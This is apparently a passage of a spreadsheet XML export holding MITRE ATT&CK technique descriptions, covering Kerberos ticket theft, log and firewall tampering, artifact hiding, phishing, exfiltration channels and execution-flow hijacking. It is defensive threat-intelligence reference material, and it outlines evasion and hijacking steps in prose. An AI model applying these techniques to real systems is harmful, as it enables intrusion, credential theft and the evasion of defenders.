additional credentials. Locations with high concentrations of public Wi-Fi access, such as airports, coffee shops, or libraries, may be targets for adversaries to set up illegitimate Wi-Fi access points. "/>
  </r>
  <r>
    <x v="138"/>
    <x v="1"/>
    <s v="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_x000a__x000a_On Windows, the built-in &lt;code&gt;klist&lt;/code&gt; utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)_x000a_"/>
  </r>
  <r>
    <x v="138"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="138"/>
    <x v="1"/>
    <s v="Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)_x000a__x000a_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_x000a__x000a_Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003)."/>
  </r>
  <r>
    <x v="138"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)_x000a__x000a_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r>
  <r>
    <x v="138"/>
    <x v="1"/>
    <s v="Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="138"/>
    <x v="1"/>
    <s v="_x000a_Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials. _x000a__x000a_The &lt;code&gt;/etc/krb5.conf&lt;/code&gt; configuration file and the &lt;code&gt;KRB5CCNAME&lt;/code&gt; environment variable are used to set the storage location for ccache entries. On Linux, credentials are typically stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`. On macOS, ccache entries are stored by default in memory with an `API:{uuid}` naming scheme. Typically, users interact with ticket storage using &lt;code&gt;kinit&lt;/code&gt;, which obtains a Ticket-Granting-Ticket (TGT) for the principal; &lt;code&gt;klist&lt;/code&gt;, which lists obtained tickets currently held in the credentials cache; and other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense Kerberos Linux)_x000a__x000a_Adversaries can collect tickets from ccache files stored on disk and authenticate as the current user without their password to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks. Adversaries can also use these tickets to impersonate legitimate users with elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004). Tools like Kekeo can also be used by adversaries to convert ccache files to Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008). On macOS, adversaries may use open-source tools or the Kerberos framework to interact with ccache files and extract TGTs or Service Tickets via lower-level APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "/>
  </r>
  <r>
    <x v="139"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="139"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="139"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="139"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="140"/>
    <x v="2"/>
    <s v="An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender._x000a__x000a_Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method."/>
  </r>
  <r>
    <x v="140"/>
    <x v="2"/>
    <s v="Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport._x000a__x000a_Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as &lt;code&gt;tar&lt;/code&gt; on Linux and macOS or &lt;code&gt;zip&lt;/code&gt; on Windows systems. _x000a__x000a_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_x000a__x000a_Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)"/>
  </r>
  <r>
    <x v="140"/>
    <x v="2"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="140"/>
    <x v="2"/>
    <s v="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
  </r>
  <r>
    <x v="141"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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_x000a__x000a_On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)"/>
  </r>
  <r>
    <x v="141"/>
    <x v="22"/>
    <s v="Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources._x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="141"/>
    <x v="22"/>
    <s v="Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. _x000a__x000a_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_x000a__x000a_On a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)_x000a__x000a_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
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)_x000a__x000a_"/>
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor._x000a__x000a_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_x000a__x000a_Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)"/>
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the &quot;Start&quo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_x000a__x000a_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_x000a__x000a_By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind."/>
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. _x000a__x000a_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_x000a__x000a_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quot;ignorespace&quot;. &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to &quot;ignoredups&quot;. In some Linux systems, this is set by default to &quot;ignoreboth&quot; which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. _x000a__x000a_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_x000a__x000a_Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. &lt;code&gt;no logging&lt;/code&gt;)."/>
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules."/>
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations._x000a__x000a_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_x000a__x000a_In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck)."/>
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). _x000a__x000a_Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)_x000a__x000a_Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "/>
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. _x000a__x000a_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_x000a__x000a_Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)"/>
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_For example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)"/>
  </r>
  <r>
    <x v="142"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="143"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="143"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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_x000a__x000a_[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078)."/>
  </r>
  <r>
    <x v="143"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)"/>
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files."/>
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)_x000a__x000a_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_x000a__x000a_Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;.(Citation: PowerShell About 2019)_x000a__x000a_In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding &lt;code&gt;explorer.exe&lt;/code&gt; process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack)  All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows."/>
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)"/>
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)_x000a__x000a_This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections."/>
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Hiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated."/>
  </r>
  <r>
    <x v="144"/>
    <x v="3"/>
    <s v="Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)_x000a__x000a_Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment."/>
  </r>
  <r>
    <x v="145"/>
    <x v="22"/>
    <s v="Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making._x000a__x000a_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r>
  <r>
    <x v="145"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="145"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="145"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="146"/>
    <x v="19"/>
    <s v="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_x000a__x000a_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or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., &quot;thread hijacking&quot;).(Citation: phishing-krebs)_x000a__x000a_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
  </r>
  <r>
    <x v="146"/>
    <x v="19"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="146"/>
    <x v="19"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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quot;IDN homograph attack&quot;).(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_x000a__x000a_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_x000a__x000a_Adversaries may also utilize spearphishing links to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured through “consent phishing” into granting adversaries permissions/access via a malicious OAuth 2.0 request URL .(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)_x000a__x000a_Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)"/>
  </r>
  <r>
    <x v="146"/>
    <x v="19"/>
    <s v="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_x000a__x000a_All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: Lookout Dark Caracal Jan 2018)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_x000a__x000a_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
  </r>
  <r>
    <x v="146"/>
    <x v="19"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)"/>
  </r>
  <r>
    <x v="147"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection."/>
  </r>
  <r>
    <x v="147"/>
    <x v="5"/>
    <s v="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_x000a__x000a_Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. "/>
  </r>
  <r>
    <x v="147"/>
    <x v="5"/>
    <s v="Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet._x000a__x000a_Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. "/>
  </r>
  <r>
    <x v="147"/>
    <x v="5"/>
    <s v="Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as &lt;code&gt;pastebin[.]com&lt;/code&gt;, are commonly used by developers to share code and other information.  _x000a__x000a_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_x000a__x000a_**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs."/>
  </r>
  <r>
    <x v="147"/>
    <x v="5"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="148"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="148"/>
    <x v="0"/>
    <s v="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_x000a__x000a_The simplest, &quot;single-flux&quot; method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)_x000a__x000a_In contrast, the &quot;double-flux&quot; method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel."/>
  </r>
  <r>
    <x v="148"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="148"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="149"/>
    <x v="9"/>
    <s v="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
  </r>
  <r>
    <x v="149"/>
    <x v="9"/>
    <s v="Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)_x000a__x000a_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quot;%s/Library/LaunchAgents/%s&quot;&lt;/code&gt; or &lt;code&gt;/bin/launchctl load&lt;/code&gt; to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)_x000a_"/>
  </r>
  <r>
    <x v="149"/>
    <x v="9"/>
    <s v="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_x000a__x000a_[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_x000a__x000a_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
  </r>
  <r>
    <x v="150"/>
    <x v="6"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="151"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)"/>
  </r>
  <r>
    <x v="152"/>
    <x v="0"/>
    <s v="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_x000a__x000a_There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) _x000a__x000a_[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_x000a__x000a_Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. "/>
  </r>
  <r>
    <x v="153"/>
    <x v="0"/>
    <s v="Adversaries may employ a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
  </r>
  <r>
    <x v="153"/>
    <x v="0"/>
    <s v="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r>
  <r>
    <x v="153"/>
    <x v="0"/>
    <s v="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_x000a__x000a_For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002)."/>
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module._x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. _x000a__x000a_Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing._x000a__x000a_For example, on Windows if an adversary places a malicious program named &quot;net.exe&quot; in `C:\example path`, which by default precedes `C:\Windows\system32\net.exe` in the PATH environment variable, when &quot;net&quot; is executed from the command-line the `C:\example path` will be called instead of the system's legitimate executable at `C:\Windows\system32\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)_x000a__x000a_Adversaries may also directly modify the $PATH variable specifying the directories to be searched.  An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)"/>
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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_x000a__x000a_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_x000a__x000a_For example, &quot;example.exe&quot; runs &quot;cmd.exe&quot; with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called &quot;net.exe&quot; within the same directory as example.exe, &quot;net.exe&quot; will be run instead of the Windows system utility net. In addition, if an adversary places a program called &quot;net.com&quot; in the same directory as &quot;net.exe&quot;, then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute &quot;net.com&quot; instead of &quot;net.exe&quot; due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)_x000a__x000a_Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001)."/>
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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_x000a__x000a_Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;&quot;C:\safe path with space\program.exe&quot;&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_x000a__x000a_This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process."/>
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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_x000a__x000a_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r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.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user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)_x000a__x000a_If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService)._x000a__x000a_Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the &lt;code&gt;FailureCommand&lt;/code&gt; key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)_x000a__x000a_The &lt;code&gt;Performance&lt;/code&gt; key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the &lt;code&gt;Performance&lt;/code&gt; key is not already present and if an adversary-controlled user has the &lt;code&gt;Create Subkey&lt;/code&gt; permission, adversaries may create the &lt;code&gt;Performance&lt;/code&gt; key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)_x000a__x000a_Adversaries may also add the &lt;code&gt;Parameters&lt;/code&gt; key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll&lt;/code&gt;.(Citation: malware_hides_service)"/>
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="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ers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="154"/>
    <x v="26"/>
    <s v="Adversaries may abuse the &lt;code&gt;KernelCallbackTable&lt;/code&gt; of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once &lt;code&gt;user32.dll&lt;/code&gt; is loaded.(Citation: Windows Process Injection KernelCallbackTable)_x000a__x000a_An adversary may hijack the execution flow of a process using the &lt;code&gt;KernelCallbackTable&lt;/code&gt; by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process._x000a__x000a_A pointer to the memory address of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be obtained by locating the PEB (ex: via a call to the &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be duplicated, and a function in the table (e.g., &lt;code&gt;fnCOPYDATA&lt;/code&gt;) set to the address of a malicious payload (ex: via &lt;code&gt;WriteProcessMemory()&lt;/code&gt;). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)_x000a__x000a_The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack execution flow may evade detection from security products since the execution can be masked under a 